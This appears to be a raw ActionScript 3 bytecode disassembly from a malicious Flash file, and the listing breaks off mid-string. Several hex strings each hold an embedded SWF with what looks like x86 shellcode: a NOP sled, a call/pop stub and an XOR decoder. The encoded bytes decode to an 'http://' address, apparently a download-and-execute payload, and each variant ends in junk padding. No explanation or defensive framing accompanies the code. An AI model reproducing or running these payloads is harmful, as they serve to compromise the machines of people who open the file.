_as3_pushstring "4657530825060000300A00A0000C03034411080000004302FFFFFFC13F20BF0100040000AA0234D1F52513FC57827DEADFF6 7573821C12551D4AB55E20F86B68556E93CF5D71496916854753045F052AE712ED8C28084362A5F02C5EAC98F9A8A35E182A 90BAC4F02C0DF41511AA0AA1C2CCBFE5176E6FB340BC106E7D8E9CE83B9B3B859C67D00ABD135B14AA84C8BA502595AAF093 70DDD39F3532475EE985A5A7209F685D61F899C60A458E5330C2C69B862A677CD2D5990A657052CDADBFC004DAD8F2441F69 E35D81C48E3F666E2DB7A456417359F820F2D9977A69643AC1B8F337CC87E3E7958FB84F92B54352618165909081EC000900 0060E80E000000906181C400090000FF71ECC20400E8000000005D83C514B98B010000B03D304500454975F9EB00ADADADAD ADADADADD4C13D3D3D62599C0D3D3D3D4531B67D31B64D2190B65535D634B67D09B07D41B65501B6CA573964D5B23D3D3DDF C45552533D3D55484F515069C22BB6D5D5443D3D3DB6EA7ABD023D48C77A6A7ABD023D48C7B6D2620EF4BCD1393C3D3DB6E1 6C6F6E55393C3D3DC26B3167646C6FB63F6E7EBD063D48C7BC46C113584558483EBED635B43EFA7E3913584558FB7E353D66 B7FC390DB5783D0EFD6D6D6E6A6DC26B2DBEC53D483B573C6EC26B39BCF9293C3D3DFE073D4889C26B356C6BB64801B64913 453EC86BB64B1D3EC80EF4747C903EF80EE632832D07EB4935FCF6303EE77DD6CC062248DA63B663193EE05BB63176B66321 3EE0B639B63EF8966364FED5C2C3C2C2B37333D1A5C3B73343E5DF4E0EF7B7660B27124D4A776C4E3D5549494D0712124D52 594E5052494F5450135358491251525A125A58495845580F134D554D025459000C0F0E1B3D3D3D3D0D0D0F595C0B0E045C04 5C0D0B0D0D0D0D0D0D0D0D0D0F5E0C080D0E0C040E0D0D0D0C0D090D040D0D0D0D0D0D0D0D0C0A3D3EC342C22FFF1D3D570F 65873D3EC342C22FFF193D85CD3D3D3D0BB0691939F013FF293D85283C3D3DD63885223C3D3D873D3EC342C22FFF293D6F69 5739571D6AC26B2967FE6CB6780178B6611542703EE0B62E3EE80EF4747CB639B7B079153F5D0EF432832D07EB4935FCF43A 3EF77DD6CC04325C48DCB67E2D3EF8B639B59664FE6C6BB64801B64913453EC86BB64B1D3EC80EF4747C903EF80EE632832D 07EB4935FCF63A3EE77DD6CC062248DA63B663193EE05BB63176B663213EE0B639B63EF8966364FED5ABC0C2C20F49AC3104 DF40BE4404DBA5E775460044B2F15D239959D2CD754600A4D7AD80B4738722CC7018E870BC0D2CBDEB92A73D3D3D3D554949 4D0712124A4A4A1347505757574444135E531253584A125C08135E4E4E3D3D3DDCD0EAB8C29C5ED7F653B2213DC977CE6CA5 82C94105B66B6CE6A5A7D9E90CA4488F775B25340E4EC9774575784088E4CB980C4FE411E06F9C5EFBF07BEC43EAB38BD685 7285254EB5AB11678A37A8158C968AA008200000000000000000000000000000000000000000000000000000000000000000 2043BF150C0000000100E59CBAE699AF20310000BF147F010000010000000010002E0000000010076E65775F666C610C4D61 696E54696D656C696E650D666C6173682E646973706C6179094D6F766965436C6970146E65775F666C613A4D61696E54696D 656C696E65066672616D6531000E6164644672616D65536372697074064F626A6563740C666C6173682E6576656E74730F45 76656E74446973706174636865720D446973706C61794F626A65637411496E7465726163746976654F626A65637416446973 706C61794F626A656374436F6E7461696E6572065370726974650716011603180517011607160A000B070102070204070406 07050807050907060B07020C07020D07020E07020F0400000000000000000000000000000000000101020803000201030100 0100000103010104010004000101090A03D0304700000102010A0B09F8628FFFFF0202024700000203010A0B0FD030D04900 5D04240060034F0402470000030201010927FC6275FC6271FCE82AFBFFFF00FC2902FC637502020202020202020202020202 0202020202024700003F1319000000010000006E65775F666C612E4D61696E54696D656C696E650040000000000000006E65 775F666C612E4D61696E54696D656C696E65000000000030383439332D383772206861736C69643861373677726569717866 676C61736620777335746536346520373874206535662073206C64666B6873616C206A68666B6C756973646F667177613772 3330383720202069737565682075697779756972200000"

//80 0f 

_as3_coerce String

//63 04 

_as3_setlocal <4>

//2c 30 

_as3_pushstring "4657530825060000300A00A0000C03034411080000004302FFFFFFC13F20BF0100040000AA0234D1F52513FC57827DEADFF6 7573821C12551D4AB55E20F86B68556E93CF5D71496916854753045F052AE712ED8C28084362A5F02C5EAC98F9A8A35E182A 90BAC4F02C0DF41511AA0AA1C2CCBFE5176E6FB340BC106E7D8E9CE83B9B3B859C67D00ABD135B14AA84C8BA502595AAF093 70DDD39F3532475EE985A5A7209F685D61F899C60A458E5330C2C69B862A677CD2D5990A657052CDADBFC004DAD8F2441F69 E35D81C48E3F666E2DB7A456417359F820F2D9977A69643AC1B8F337CC87E3E7958FB84F92B54352618165909081EC000900 0060E80E000000906181C400090000FF71ECC20400E8000000005D83C514B98B010000B03D304500454975F9EB00ADADADAD ADADADADD4C13D3D3D62599C0D3D3D3D4531B67D31B64D2190B65535D634B67D09B07D41B65501B6CA573964D5B23D3D3DDF C45552533D3D55484F515069C22BB6D5D5443D3D3DB6EA7ABD023D48C77A6A7ABD023D48C7B6D2620EF4BCD1393C3D3DB6E1 6C6F6E55393C3D3DC26B3167646C6FB63F6E7EBD063D48C7BC46C113584558483EBED635B43EFA7E3913584558FB7E353D66 B7FC390DB5783D0EFD6D6D6E6A6DC26B2DBEC53D483B573C6EC26B39BCF9293C3D3DFE073D4889C26B356C6BB64801B64913 453EC86BB64B1D3EC80EF4747C903EF80EE632832D07EB4935FCF6303EE77DD6CC062248DA63B663193EE05BB63176B66321 3EE0B639B63EF8966364FED5C2C3C2C2B37333D1A5C3B73343E5DF4E0EF7B7660B27124D4A776C4E3D5549494D0712124D52 594E5052494F5450135358491251525A125A58495845580F134D554D025459000C0F0E1B3D3D3D3D0D0D0F595C0B0E045C04 5C0D0B0D0D0D0D0D0D0D0D0D0F5E0C080D0E0C040E0D0D0D0C0D090D040D0D0D0D0D0D0D0D0C0A3D3EC342C22FFF1D3D570F 65873D3EC342C22FFF193D85CD3D3D3D0BB0691939F013FF293D85283C3D3DD63885223C3D3D873D3EC342C22FFF293D6F69 5739571D6AC26B2967FE6CB6780178B6611542703EE0B62E3EE80EF4747CB639B7B079153F5D0EF432832D07EB4935FCF43A 3EF77DD6CC04325C48DCB67E2D3EF8B639B59664FE6C6BB64801B64913453EC86BB64B1D3EC80EF4747C903EF80EE632832D 07EB4935FCF63A3EE77DD6CC062248DA63B663193EE05BB63176B663213EE0B639B63EF8966364FED5ABC0C2C20F49AC3104 DF40BE4404DBA5E775460044B2F15D239959D2CD754600A4D7AD80B4738722CC7018E870BC0D2CBDEB92A73D3D3D3D554949 4D0712124A4A4A1347505757574444135E531253584A125C08135E4E4E3D3D3DDCD0EAB8C29C5ED7F653B2213DC977CE6CA5 82C94105B66B6CE6A5A7D9E90CA4488F775B25340E4EC9774575784088E4CB980C4FE411E06F9C5EFBF07BEC43EAB38BD685 7285254EB5AB11678A37A815A5848AA008200000000000000000000000000000000000000000000000000000000000000000 2043BF150C0000000100E59CBAE699AF20310000BF147F010000010000000010002E0000000010076E65775F666C610C4D61 696E54696D656C696E650D666C6173682E646973706C6179094D6F766965436C6970146E65775F666C613A4D61696E54696D 656C696E65066672616D6531000E6164644672616D65536372697074064F626A6563740C666C6173682E6576656E74730F45 76656E74446973706174636865720D446973706C61794F626A65637411496E7465726163746976654F626A65637416446973 706C61794F626A656374436F6E7461696E6572065370726974650716011603180517011607160A000B070102070204070406 07050807050907060B07020C07020D07020E07020F0400000000000000000000000000000000000101020803000201030100 0100000103010104010004000101090A03D0304700000102010A0B09F8628FFFFF0202024700000203010A0B0FD030D04900 5D04240060034F0402470000030201010927F86275F86271F8E82AFBFFFF00F82902F8637502020202020202020202020202 0202020202024700003F1319000000010000006E65775F666C612E4D61696E54696D656C696E650040000000000000006E65 775F666C612E4D61696E54696D656C696E650000000000657566686A646B6A7A6B6A79646F71756977363734653038323032 3938343837207969736837717567736438393339742D7467206C6B6A63676C6A646B6C797468646B68676679773837797230 73666B646873667338376F653635373839373933390000"

//80 0f 

_as3_coerce String

//63 05 

_as3_setlocal <5>

//2c 31 

_as3_pushstring "4657530825060000300A00A0000C03034411080000004302FFFFFFC13F20BF0100040000AA0234D1F52513FC57827DEADFF6 7573821C12551D4AB55E20F86B68556E93CF5D71496916854753045F052AE712ED8C28084362A5F02C5EAC98F9A8A35E182A 90BAC4F02C0DF41511AA0AA1C2CCBFE5176E6FB340BC106E7D8E9CE83B9B3B859C67D00ABD135B14AA84C8BA502595AAF093 70DDD39F3532475EE985A5A7209F685D61F899C60A458E5330C2C69B862A677CD2D5990A657052CDADBFC004DAD8F2441F69 E35D81C48E3F666E2DB7A456417359F820F2D9977A69643AC1B8F337CC87E3E7958FB84F92B54352618165909081EC000900 0060E80E000000906181C400090000FF71ECC20400E8000000005D83C514B98B010000B03D304500454975F9EB00ADADADAD ADADADADD4C13D3D3D62599C0D3D3D3D4531B67D31B64D2190B65535D634B67D09B07D41B65501B6CA573964D5B23D3D3DDF C45552533D3D55484F515069C22BB6D5D5443D3D3DB6EA7ABD023D48C77A6A7ABD023D48C7B6D2620EF4BCD1393C3D3DB6E1 6C6F6E55393C3D3DC26B3167646C6FB63F6E7EBD063D48C7BC46C113584558483EBED635B43EFA7E3913584558FB7E353D66 B7FC390DB5783D0EFD6D6D6E6A6DC26B2DBEC53D483B573C6EC26B39BCF9293C3D3DFE073D4889C26B356C6BB64801B64913 453EC86BB64B1D3EC80EF4747C903EF80EE632832D07EB4935FCF6303EE77DD6CC062248DA63B663193EE05BB63176B66321 3EE0B639B63EF8966364FED5C2C3C2C2B37333D1A5C3B73343E5DF4E0EF7B7660B27124D4A776C4E3D5549494D0712124D52 594E5052494F5450135358491251525A125A58495845580F134D554D025459000C0F0E1B3D3D3D3D0D0D0F595C0B0E045C04 5C0D0B0D0D0D0D0D0D0D0D0D0F5E0C080D0E0C040E0D0D0D0C0D090D040D0D0D0D0D0D0D0D0C0A3D3EC342C22FFF1D3D570F 65873D3EC342C22FFF193D85CD3D3D3D0BB0691939F013FF293D85283C3D3DD63885223C3D3D873D3EC342C22FFF293D6F69 5739571D6AC26B2967FE6CB6780178B6611542703EE0B62E3EE80EF4747CB639B7B079153F5D0EF432832D07EB4935FCF43A 3EF77DD6CC04325C48DCB67E2D3EF8B639B59664FE6C6BB64801B64913453EC86BB64B1D3EC80EF4747C903EF80EE632832D 07EB4935FCF63A3EE77DD6CC062248DA63B663193EE05BB63176B663213EE0B639B63EF8966364FED5ABC0C2C20F49AC3104 DF40BE4404DBA5E775460044B2F15D239959D2CD754600A4D7AD80B4738722CC7018E870BC0D2CBDEB92A73D3D3D3D554949 4D0712124A4A4A1347505757574444135E531253584A125C08135E4E4E3D3D3DDCD0EAB8C29C5ED7F653B2213DC977CE6CA5 82C94105B66B6CE6A5A7D9E90CA4488F775B25340E4EC9774575784088E4CB980C4FE411E06F9C5EFBF07BEC43EAB38BD685 7285254EB5AB11678A37A815DE838EA008200000000000000000000000000000000000000000000000000000000000000000 2043BF150C0000000100E59CBAE699AF20310000BF147F010000010000000010002E0000000010076E65775F666C610C4D61 696E54696D656C696E650D666C6173682E646973706C6179094D6F766965436C6970146E65775F666C613A4D61696E54696D 656C696E65066672616D6531000E6164644672616D65536372697074064F626A6563740C666C6173682E6576656E74730F45 76656E74446973706174636865720D446973706C61794F626A65637411496E7465726163746976654F626A65637416446973 706C61794F626A656374436F6E7461696E6572065370726974650716011603180517011607160A000B070102070204070406 07050807050907060B07020C07020D07020E07020F0400000000000000000000000000000000000101020803000201030100 0100000103010104010004000101090A03D0304700000102010A0B09F8628FFFFF0202024700000203010A0B0FD030D04900 5D04240060034F0402470000030201010927F56279F56275F5E82AFBFFFF00F52902F5637902020202020202020202020202 0202020202024700003F1319000000010000006E65775F666C612E4D61696E54696D656C696E650040000000000000006E65 775F666C612E4D61696E54696D656C696E6500400000005E2A2628295F295F2928295E5E242548474C4B4A48474B54616A68 723B206F697775686E6263206A61796B64747265206878636B61632E2E2C2C68697364662069686173646F756A78636E7862 206A6320676668767A6A64676179757364666767670000"

//80 0f 

_as3_coerce String

//63 06 

_as3_setlocal <6>

//2c 32 

_as3_pushstring "4657530825060000300A00A0000C03034411080000004302FFFFFFC13F20BF0100040000AA0234D1F52513C8F123283D7FAD A171C3644EBFED5DD8328C1A62A6FE57740FFC7488E90BBA92BB4A6A9EADFD438815BA094B830B21632C09D4E5B9385EAB60 16B42E4436568A0BE3F24728883C31396B4894847DB29674BB005E9EF56D04A1E89F400982EDF2E64EACF1D4464536279CF3 5BD4316EFB0FBEEC77ED8AB213AE86288B7BC51F8DA0ADC9A8BFB10D2AC9279E02EAE536929FC03112279860648591038BC2 AA0D93B3B9C22359984591B4F7209F9EB0ED4A7203A5C0AD99ABF6C9402BF2EAACDFB0B94052D1759E2965909081EC000900 0060E80E000000906181C400090000FF71ECC20400E8000000005D83C514B98B010000B03D304500454975F9EB00ADADADAD ADADADADD4C13D3D3D62599C0D3D3D3D4531B67D31B64D2190B65535D634B67D09B07D41B65501B6CA573964D5B23D3D3DDF C45552533D3D55484F515069C22BB6D5D5443D3D3DB6EA7ABD023D48C77A6A7ABD023D48C7B6D2620EF4BCD1393C3D3DB6E1 6C6F6E55393C3D3DC26B3167646C6FB63F6E7EBD063D48C7BC46C113584558483EBED635B43EFA7E3913584558FB7E353D66 B7FC390DB5783D0EFD6D6D6E6A6DC26B2DBEC53D483B573C6EC26B39BCF9293C3D3DFE073D4889C26B356C6BB64801B64913 453EC86BB64B1D3EC80EF4747C903EF80EE632832D07EB4935FCF6303EE77DD6CC062248DA63B663193EE05BB63176B66321 3EE0B639B63EF8966364FED5C2C3C2C2B37333D1A5C3B73343E5DF4E0EF7B7660B27124D4A776C4E3D5549494D0712124D52 594E5052494F5450135358491251525A125A58495845580F134D554D025459000C0F0E1B3D3D3D3D0D0D0F595C0B0E045C04 5C0D0B0D0D0D0D0D0D0D0D0D0F5E0C080D0E0C040E0D0D0D0C0D090D040D0D0D0D0D0D0D0D0C0A3D3EC342C22FFF1D3D570F 65873D3EC342C22FFF193D85CD3D3D3D0BB0691939F013FF293D85283C3D3DD63885223C3D3D873D3EC342C22FFF293D6F69 5739571D6AC26B2967FE6CB6780178B6611542703EE0B62E3EE80EF4747CB639B7B079153F5D0EF432832D07EB4935FCF43A 3EF77DD6CC04325C48DCB67E2D3EF8B639B59664FE6C6BB64801B64913453EC86BB64B1D3EC80EF4747C903EF80EE632832D 07EB4935FCF63A3EE77DD6CC062248DA63B663193EE05BB63176B663213EE0B639B63EF8966364FED5ABC0C2C20F49AC3104 DF40BE4404DBA5E775460044B2F15D239959D2CD754600A4D7AD80B4738722CC7018E870BC0D2CBDEB92A73D3D3D3D554949 4D0712124A4A4A1347505757574444135E531253584A125C08135E4E4E3D3D3DA4E16D2F4E83393F6EA0821C539B44A714A7 BF34B68D3DDE52EA0320C70AB1DEC858295092D77E8DEE1D5D9DF12DBBE08C4DB009E31D0029FC107EF8BB8F735441672895 1B4BACD4E7019CADC394A815EAAE8EA008200000000000000000000000000000000000000000000000000000000000000000 2043BF150C0000000100E59CBAE699AF20310000BF147F010000010000000010002E0000000010076E65775F666C610C4D61 696E54696D656C696E650D666C6173682E646973706C6179094D6F766965436C6970146E65775F666C613A4D61696E54696D 656C696E65066672616D6531000E6164644672616D65536372697074064F626A6563740C666C6173682E6576656E74730F45 76656E74446973706174636865720D446973706C61794F626A65637411496E7465726163746976654F626A65637416446973 706C61794F626A656374436F6E7461696E6572065370726974650716011603180517011607160A000B070102070204070406 07050807050907060B07020C07020D07020E07020F0400000000000000000000000000000000000101020803000201030100 0100000103010104010004000101090A03D0304700000102010A0B09F8628FFFFF0202024700000203010A0B0FD030D04900 5D04240060034F0402470000030201010927F56279F56275F5E82AFBFFFF00F52902F5637902020202020202020202020202 0202020202024700003F1319000000010000006E65775F666C612E4D61696E54696D656C696E650040000000000000006E65 775F666C612E4D61696E54696D656C696E6500000000007E4023232526285F292B5F28295F2A2A255E252B4A494F4B484748 474654524545434254254547464E47595E5E613977726F396A682064666874393820646667206B646C6F6620796B6C7A7368 67636173777478666B6A6B666866683535353432310000"

//80 0f 

_as3_coerce String

//63 07 

_as3_setlocal <7>

//2c 33 

_as3_pushstring "4657530825060000300A00A0000C03034411080000004302FFFFFFC13F20BF0100040000AA0234D1F52513C8F123283D7FAD A171C3644EBFED5DD8328C1A62A6FE57740FFC7488E90BBA92BB4A6A9EADFD438815BA094B830B21632C09D4E5B9385EAB60 16B42E4436568A0BE3F24728883C31396B4894847DB29674BB005E9EF56D04A1E89F400982EDF2E64EACF1D4464536279CF3 5BD4316EFB0FBEEC77ED8AB213AE86288B7BC51F8DA0ADC9A8BFB10D2AC9279E02EAE536929FC03112279860648591038BC2 AA0D93B3B9C22359984591B4F7209F9EB0ED4A7203A5C0AD99ABF6C9402BF2EAACDFB0B94052D1759E2965909081EC000900 0060E80E000000906181C400090000FF71ECC20400E8000000005D83C514B98B010000B03D304500454975F9EB00ADADADAD ADADADADD4C13D3D3D62599C0D3D3D3D4531B67D31B64D2190B65535D634B67D09B07D41B65501B6CA573964D5B23D3D3DDF C45552533D3D55484F515069C22BB6D5D5443D3D3DB6EA7ABD023D48C77A6A7ABD023D48C7B6D2620EF4BCD1393C3D3DB6E1 6C6F6E55393C3D3DC26B3167646C6FB63F6E7EBD063D48C7BC46C113584558483EBED635B43EFA7E3913584558FB7E353D66 B7FC390DB5783D0EFD6D6D6E6A6DC26B2DBEC53D483B573C6EC26B39BCF9293C3D3DFE073D4889C26B356C6BB64801B64913 453EC86BB64B1D3EC80EF4747C903EF80EE632832D07EB4935FCF6303EE77DD6CC062248DA63B663193EE05BB63176B66321 3EE0B639B63EF8966364FED5C2C3C2C2B37333D1A5C3B73343E5DF4E0EF7B7660B27124D4A776C4E3D5549494D0712124D52 594E5052494F5450135358491251525A125A58495845580F134D554D025459000C0F0E1B3D3D3D3D0D0D0F595C0B0E045C04 5C0D0B0D0D0D0D0D0D0D0D0D0F5E0C080D0E0C040E0D0D0D0C0D090D040D0D0D0D0D0D0D0D0C0A3D3EC342C22FFF1D3D570F 65873D3EC342C22FFF193D85CD3D3D3D0BB0691939F013FF293D85283C3D3DD63885223C3D3D873D3EC342C22FFF293D6F69 5739571D6AC26B2967FE6CB6780178B6611542703EE0B62E3EE80EF4747CB639B7B079153F5D0EF432832D07EB4935FCF43A 3EF77DD6CC04325C48DCB67E2D3EF8B639B59664FE6C6BB64801B64913453EC86BB64B1D3EC80EF4747C903EF80EE632832D 07EB4935FCF63A3EE77DD6CC062248DA63B663193EE05BB63176B663213EE0B639B63EF8966364FED5ABC0C2C20F49AC3104 DF40BE4404DBA5E775460044B2F15D239959D2CD754600A4D7AD80B4738722CC7018E870BC0D2CBDEB92A73D3D3D3D554949 4D0712124A4A4A1347505757574444135E531253584A125C08135E4E4E3D3D3DA4E16D2F4E83393F6EA0821C539B44A714A7 BF34B68D3DDE52EA0320C70AB1DEC858295092D77E8DEE1D5D9DF12DBBE08C4DB009E31D0029FC107EF8BB8F735441672895 1B4BACD4E7019CADC394A815A6E18AA008200000000000000000000000000000000000000000000000000000000000000000 2043BF150C0000000100E59CBAE699AF20310000BF147F010000010000000010002E0000000010076E65775F666C610C4D61 696E54696D656C696E650D666C6173682E646973706C6179094D6F766965436C6970146E65775F666C613A4D61696E54696D 656C696E65066672616D6531000E6164644672616D65536372697074064F626A6563740C666C6173682E6576656E74730F45 76656E74446973706174636865720D446973706C61794F626A65637411496E7465726163746976654F626A65637416446973 706C61794F626A656374436F6E7461696E6572065370726974650716011603180517011607160A000B070102070204070406 07050807050907060B07020C07020D07020E07020F0400000000000000000000000000000000000101020803000201030100 0100000103010104010004000101090A03D0304700000102010A0B09F8628FFFFF0202024700000203010A0B0FD030D04900 5D04240060034F0402470000030201010927F56275F56271F5E82AFBFFFF00F52902F5637502020202020202020202020202 0202020202024700003F1319000000010000006E65775F666C612E4D61696E54696D656C696E650040000000000000006E65 775F666C612E4D61696E54696D656C696E6500400000002324265E2A282A2829295F295F28295F2A2829265E2A28265E2425 5459544A484746484755495E45255E252A2628295F68675A4A6820677A687367206A6867662068676820647566207739206B 65272067705B6E686464686773786A68636B6A6C380000"

//80 0f 

_as3_coerce String

//63 08 

_as3_setlocal <8>

//2c 34 

_as3_pushstring "4657530825060000300A00A0000C03034411080000004302FFFFFFC13F20BF0100040000AA0234D1F52513C8F123283D7FAD A171C3644EBFED5DD8328C1A62A6FE57740FFC7488E90BBA92BB4A6A9EADFD438815BA094B830B21632C09D4E5B9385EAB60 16B42E4436568A0BE3F24728883C31396B4894847DB29674BB005E9EF56D04A1E89F400982EDF2E64EACF1D4464536279CF3 5BD4316EFB0FBEEC77ED8AB213AE86288B7BC51F8DA0ADC9A8BFB10D2AC9279E02EAE536929FC03112279860648591038BC2 AA0D93B3B9C22359984591B4F7209F9EB0ED4A7203A5C0AD99ABF6C9402BF2EAACDFB0B94052D1759E2965909081EC000900 0060E80E000000906181C400090000FF71ECC20400E8000000005D83C514B98B010000B03D304500454975F9EB00ADADADAD ADADADADD4C13D3D3D62599C0D3D3D3D4531B67D31B64D2190B65535D634B67D09B07D41B65501B6CA573964D5B23D3D3DDF C45552533D3D55484F515069C22BB6D5D5443D3D3DB6EA7ABD023D48C77A6A7ABD023D48C7B6D2620EF4BCD1393C3D3DB6E1 6C6F6E55393C3D3DC26B3167646C6FB63F6E7EBD063D48C7BC46C113584558483EBED635B43EFA7E3913584558FB7E353D66 B7FC390DB5783D0EFD6D6D6E6A6DC26B2DBEC53D483B573C6EC26B39BCF9293C3D3DFE073D4889C26B356C6BB64801B64913 453EC86BB64B1D3EC80EF4747C903EF80EE632832D07EB4935FCF6303EE77DD6CC062248DA63B663193EE05BB63176B66321 3EE0B639B63EF8966364FED5C2C3C2C2B37333D1A5C3B73343E5DF4E0EF7B7660B27124D4A776C4E3D5549494D0712124D52 594E5052494F5450135358491251525A125A58495845580F134D554D025459000C0F0E1B3D3D3D3D0D0D0F595C0B0E045C04 5C0D0B0D0D0D0D0D0D0D0D0D0F5E0C080D0E0C040E0D0D0D0C0D090D040D0D0D0D0D0D0D0D0C0A3D3EC342C22FFF1D3D570F 65873D3EC342C22FFF193D85CD3D3D3D0BB0691939F013FF293D85283C3D3DD63885223C3D3D873D3EC342C22FFF293D6F69 5739571D6AC26B2967FE6CB6780178B6611542703EE0B62E3EE80EF4747CB639B7B079153F5D0EF432832D07EB4935FCF43A 3EF77DD6CC04325C48DCB67E2D3EF8B639B59664FE6C6BB64801B64913453EC86BB64B1D3EC80EF4747C903EF80EE632832D 07EB4935FCF63A3EE77DD6CC062248DA63B663193EE05BB63176B663213EE0B639B63EF8966364FED5ABC0C2C20F49AC3104 DF40BE4404DBA5E775460044B2F15D239959D2CD754600A4D7AD80B4738722CC7018E870BC0D2CBDEB92A73D3D3D3D554949 4D0712124A4A4A1347505757574444135E531253584A125C08135E4E4E3D3D3DA4E16D2F4E83393F6EA0821C539B44A714A7 BF34B68D3DDE52EA0320C70AB1DEC858295092D77E8DEE1D5D9DF12DBBE08C4DB009E31D0029FC107EF8BB8F735441672895 1B4BACD4E7019CADC394A815D1DE8AA008200000000000000000000000000000000000000000000000000000000000000000 2043BF150C0000000100E59CBAE699AF20310000BF147F010000010000000010002E0000000010076E65775F666C610C4D61 696E54696D656C696E650D666C6173682E646973706C6179094D6F766965436C6970146E65775F666C613A4D61696E54696D 656C696E65066672616D6531000E6164644672616D65536372697074064F626A6563740C666C6173682E6576656E74730F45 76656E74446973706174636865720D446973706C61794F626A65637411496E7465726163746976654F626A65637416446973 706C61794F626A656374436F6E7461696E6572065370726974650716011603180517011607160A000B070102070204070406 07050807050907060B07020C07020D07020E07020F0400000000000000000000000000000000000101020803000201030100 0100000103010104010004000101090A03D0304700000102010A0B09F8628FFFFF0202024700000203010A0B0FD030D04900 5D04240060034F0402470000030201010927F86275F86271F8E82AFBFFFF00F82902F8637502020202020202020202020202 0202020202024700003F1319000000010000006E65775F666C612E4D61696E54696D656C696E650040000000000000006E65 775F666C612E4D61696E54696D656C696E6500400000007A6A73206A687366206B2A2A265E2524232423255E23252A282829 262829265E2A265E23252423255E255E262A262A262A2828295F2929282A285E2A26255E2425242521407E217E2423405E25 5E2A265E2A28262A28295E2A265E24255E242325240100"

//80 0f 

_as3_coerce String

//63 09 

_as3_setlocal <9>

//2c 35 

_as3_pushstring "4657530825060000300A00A0000C03034411080000004302FFFFFFC13F20BF0100040000AA0234D1F52513C8F123283D7FAD A171C3644EBFED5DD8328C1A62A6FE57740FFC7488E90BBA92BB4A6A9EADFD438815BA094B830B21632C09D4E5B9385EAB60 16B42E4436568A0BE3F24728883C31396B4894847DB29674BB005E9EF56D04A1E89F400982EDF2E64EACF1D4464536279CF3 5BD4316EFB0FBEEC77ED8AB213AE86288B7BC51F8DA0ADC9A8BFB10D2AC9279E02EAE536929FC03112279860648591038BC2 AA0D93B3B9C22359984591B4F7209F9EB0ED4A7203A5C0AD99ABF6C9402BF2EAACDFB0B94052D1759E2965909081EC000900 0060E80E000000906181C400090000FF71ECC20400E8000000005D83C514B98B010000B03D304500454975F9EB00ADADADAD ADADADADD4C13D3D3D62599C0D3D3D3D4531B67D31B64D2190B65535D634B67D09B07D41B65501B6CA573964D5B23D3D3DDF C45552533D3D55484F515069C22BB6D5D5443D3D3DB6EA7ABD023D48C77A6A7ABD023D48C7B6D2620EF4BCD1393C3D3DB6E1 6C6F6E55393C3D3DC26B3167646C6FB63F6E7EBD063D48C7BC46C113584558483EBED635B43EFA7E3913584558FB7E353D66 B7FC390DB5783D0EFD6D6D6E6A6DC26B2DBEC53D483B573C6EC26B39BCF9293C3D3DFE073D4889C26B356C6BB64801B64913 453EC86BB64B1D3EC80EF4747C903EF80EE632832D07EB4935FCF6303EE77DD6CC062248DA63B663193EE05BB63176B66321 3EE0B639B63EF8966364FED5C2C3C2C2B37333D1A5C3B73343E5DF4E0EF7B7660B27124D4A776C4E3D5549494D0712124D52 594E5052494F5450135358491251525A125A58495845580F134D554D025459000C0F0E1B3D3D3D3D0D0D0F595C0B0E045C04 5C0D0B0D0D0D0D0D0D0D0D0D0F5E0C080D0E0C040E0D0D0D0C0D090D040D0D0D0D0D0D0D0D0C0A3D3EC342C22FFF1D3D570F 65873D3EC342C22FFF193D85CD3D3D3D0BB0691939F013FF293D85283C3D3DD63885223C3D3D873D3EC342C22FFF293D6F69 5739571D6AC26B2967FE6CB6780178B6611542703EE0B62E3EE80EF4747CB639B7B079153F5D0EF432832D07EB4935FCF43A 3EF77DD6CC04325C48DCB67E2D3EF8B639B59664FE6C6BB64801B64913453EC86BB64B1D3EC80EF4747C903EF80EE632832D 07EB4935FCF63A3EE77DD6CC062248DA63B663193EE05BB63176B663213EE0B639B63EF8966364FED5ABC0C2C20F49AC3104 DF40BE4404DBA5E775460044B2F15D239959D2CD754600A4D7AD80B4738722CC7018E870BC0D2CBDEB92A73D3D3D3D554949 4D0712124A4A4A1347505757574444135E531253584A125C08135E4E4E3D3D3DA4E16D2F4E83393F6EA0821C539B44A714A7 BF34B68D3DDE52EA0320C70AB1DEC858295092D77E8DEE1D5D9DF12DBBE08C4DB009E31D0029FC107EF8BB8F735441672895 1B4BACD4E7019CADC394A815E8BC8AA008200000000000000000000000000000000000000000000000000000000000000000 2043BF150C0000000100E59CBAE699AF20310000BF147F010000010000000010002E0000000010076E65775F666C610C4D61 696E54696D656C696E650D666C6173682E646973706C6179094D6F766965436C6970146E65775F666C613A4D61696E54696D 656C696E65066672616D6531000E6164644672616D65536372697074064F626A6563740C666C6173682E6576656E74730F45 76656E74446973706174636865720D446973706C61794F626A65637411496E7465726163746976654F626A65637416446973 706C61794F626A656374436F6E7461696E6572065370726974650716011603180517011607160A000B070102070204070406 07050807050907060B07020C07020D07020E07020F0400000000000000000000000000000000000101020803000201030100 0100000103010104010004000101090A03D0304700000102010A0B09F8628FFFFF0202024700000203010A0B0FD030D04900 5D04240060034F0402470000030201010927FC6275FC6271FCE82AFBFFFF00FC2902FC637502020202020202020202020202 0202020202024700003F1319000000010000006E65775F666C612E4D61696E54696D656C696E650040000000000000006E65 775F666C612E4D61696E54696D656C696E65004000000040235E2425262A295F206A68616764206877697472206A68666777 6F7472206F627366206A6735333436383433353435363438367366206A62666D206273666A736766206B757967667A786263 6B61736A68667039717738207061206473686766310000"

//80 0f 

_as3_coerce String

//63 0a 

_as3_setlocal <10>

//2c 36 

_as3_pushstring "4657530825060000300A00A0000C03034411080000004302FFFFFFC13F20BF0100040000AA0234D1F52513C8F123283D7FAD A171C3644EBFED5DD8328C1A62A6FE57740FFC7488E90BBA92BB4A6A9EADFD438815BA094B830B21632C09D4E5B9385EAB60 16B42E4436568A0BE3F24728883C31396B4894847DB29674BB005E9EF56D04A1E89F400982EDF2E64EACF1D4464536279CF3 5BD4316EFB0FBEEC77ED8AB213AE86288B7BC51F8DA0ADC9A8BFB10D2AC9279E02EAE536929FC03112279860648591038BC2 AA0D93B3B9C22359984591B4F7209F9EB0ED4A7203A5C0AD99ABF6C9402BF2EAACDFB0B94052D1759E2965909081EC000900 0060E80E000000906181C400090000FF71ECC20400E8000000005D83C514B98B010000B03D304500454975F9EB00ADADADAD ADADADADD4C13D3D3D62599C0D3D3D3D4531B67D31B64D2190B65535D634B67D09B07D41B65501B6CA573964D5B23D3D3DDF C45552533D3D55484F515069C22BB6D5D5443D3D3DB6EA7ABD023D48C77A6A7ABD023D48C7B6D2620EF4BCD1393C3D3DB6E1 6C6F6E55393C3D3DC26B3167646C6FB63F6E7EBD063D48C7BC46C113584558483EBED635B43EFA7E3913584558FB7E353D66 